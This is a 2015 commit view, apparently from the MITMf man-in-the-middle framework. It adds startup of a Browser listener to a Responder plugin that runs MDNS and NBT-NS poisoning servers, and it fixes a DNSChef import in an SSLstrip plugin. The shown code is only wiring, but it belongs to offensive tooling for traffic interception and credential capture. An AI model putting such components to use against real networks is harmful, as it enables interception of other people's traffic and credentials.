Forgot to start up the Browser server.. oops!
This commit is contained in:
byt3bl33d3r 2015-08-05 14:26:44 +02:00
commit e22276477b
8 changed files with 32 additions and 18 deletions

View file

@ -42,6 +42,10 @@ class Responder(Plugin):
MDNS.start()
NBTNS.start()
# Load Browser Listener
import core.servers.Browser as Browser
Browser.start()
if self.config["Responder"]["SQL"].lower() == "on":
from core.servers.MSSQL import MSSQL
self.tree_info.append("MSSQL server [ON]")

View file

@ -30,7 +30,7 @@ class SSLstripPlus(Plugin):
self.options = options
from core.sslstrip.URLMonitor import URLMonitor
from core.servers.dns.DNSchef import DNSChef
from core.servers.DNS import DNSChef
from core.utils import iptables
if iptables().dns is False: